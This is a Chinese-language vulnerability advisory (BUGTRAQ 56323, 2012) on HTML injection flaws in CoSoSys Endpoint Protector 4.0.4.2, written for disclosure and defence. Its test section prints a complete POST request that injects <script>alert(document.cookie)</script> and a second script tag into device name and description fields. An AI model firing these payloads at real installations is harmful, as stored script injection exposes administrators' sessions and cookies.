Endpoint Protector多个HTML注入漏洞


发布日期:2012-10-29
更新日期:2012-10-31

受影响系统:
CoSoSys Endpoint Protector 4.0.4.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56323

CoSoSys Endpoint Protector是数据丢失防护软件。

Endpoint Protector 4.0.4.2及其他版本存在多个HTML注入漏洞,成功利用后看允许在受影响浏览器中执行攻击者提供的HTML和脚本代码。

<*来源:Juan Manuel Garcia
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

* The parameter "client_device[name]" in the POST request has been set to:
<script>alert(document.cookie)</script>
* The parameter "client_device[description]" in the POST request has been set to:
<script>alert(1)</script>
POST /index.php/clientdevice/create HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.example.com/index.php/
Cookie: place=clientdevice; mark=clientdevice; ratool=d4d3242c4444254d035b7f797738837e
Content-Type: multipart/form-data; boundary=---------------------------
17723440641777718806882422624
Content-Length: 1131
-----------------------------17723440641777718806882422624
Content-Disposition: form-data; name="id"
-----------------------------17723440641777718806882422624
Content-Disposition: form-data; name="client_device[department_id]"
1
-----------------------------17723440641777718806882422624
Content-Disposition: form-data; name="client_device[device_type_id]"
1
-----------------------------17723440641777718806882422624
Content-Disposition: form-data; name="client_device[name]"
<script>alert(document.cookie)</script>
-----------------------------17723440641777718806882422624
Content-Disposition: form-data; name="client_device[description]"
<script>alert(1)</script>
-----------------------------17723440641777718806882422624
Content-Disposition: form-data; name="client_device[vid]"
-----------------------------17723440641777718806882422624
Content-Disposition: form-data; name="client_device[pid]"
-----------------------------17723440641777718806882422624
Content-Disposition: form-data; name="client_device[serialno]"
-----------------------------17723440641777718806882422624--

建议:
--------------------------------------------------------------------------------
厂商补丁:

CoSoSys
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

www.endpointprotector.com/

相关内容